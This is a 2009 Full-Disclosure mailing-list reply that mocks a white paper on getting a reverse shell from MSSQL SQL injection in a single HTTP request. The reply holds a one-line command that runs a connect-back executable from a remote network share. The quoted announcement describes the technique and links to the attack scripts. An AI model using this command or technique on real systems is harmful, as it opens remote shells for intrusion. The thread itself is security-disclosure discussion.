[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] One Click Ownage [White Paper and Scripts]
- To: Ferruh Mavituna <ferruh@xxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] One Click Ownage [White Paper and Scripts]
- From: Fredrick Diggle <fdiggle@xxxxxxxxx>
- Date: Sun, 5 Jul 2009 23:22:22 -0500
Or just
'start \\DiggleSec.com\fredrick\connectback.exe'
would have also been acceptable.
But Fredrick is sure that your 20 page write-up was fantastically entertaining.
On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh@xxxxxxxxxxxx> wrote:
> This is a different and more practical approach to get a reverse shell
> or code execution in SQL Injections (particularly in MSSQL). The idea
> is simple. Getting a reverse shell from an SQL Injection with one HTTP
> request without using an extra channel such as TFTP, FTP to upload the
> initial payload.
>
> White paper explains the steps and the details of the attack. Scripts
> got all the tools you need to create your HTTP request with your own
> payload.
>
>
> White Paper:
> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>
> Scripts:
> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>
> Presentation (IT Underground 2009):
> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>
>
>
> Regards,
>
>
> --
> http://ferruh.mavituna.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/